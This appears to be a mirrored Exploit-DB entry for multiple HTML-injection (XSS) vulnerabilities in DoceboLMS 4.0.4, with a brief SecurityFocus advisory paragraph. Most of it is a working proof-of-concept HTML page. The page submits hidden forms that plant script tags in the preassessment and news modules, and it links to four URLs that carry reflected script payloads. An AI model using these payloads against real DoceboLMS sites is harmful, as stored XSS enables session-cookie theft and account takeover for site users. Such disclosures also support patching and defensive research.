DoceboLms 4.0.4 – ‘index.php’ Multiple HTML Injection Vulnerabilities - 体验盒子

作者： LiquidWorm
日期： 2011-04-03
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/35564/
source: https://www.securityfocus.com/bid/47150/info

DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

DoceboLMS 4.0.4 is vulnerable; other versions may also be affected. 

<html>
<title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>

<br /><br />

<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="code" value=&#039;"><script>alert(1)</script>&#039; />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="id_assess" value="0" />
<input type="hidden" name="name" value=&#039;"><script>alert(2)</script>&#039; />
<input type="hidden" name="save" value="Save changes" /></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br />

<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="language" value="2" />
<input type="hidden" name="long_desc" value="" />
<input type="hidden" name="news" value="Insert" />
<input type="hidden" name="short_desc" value="ZSL" />
<input type="hidden" name="title" value=&#039;"><script>alert(1)</script>&#039; /></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br />

<a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br />

<a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br />

<a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br />

<a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br />

</body></html>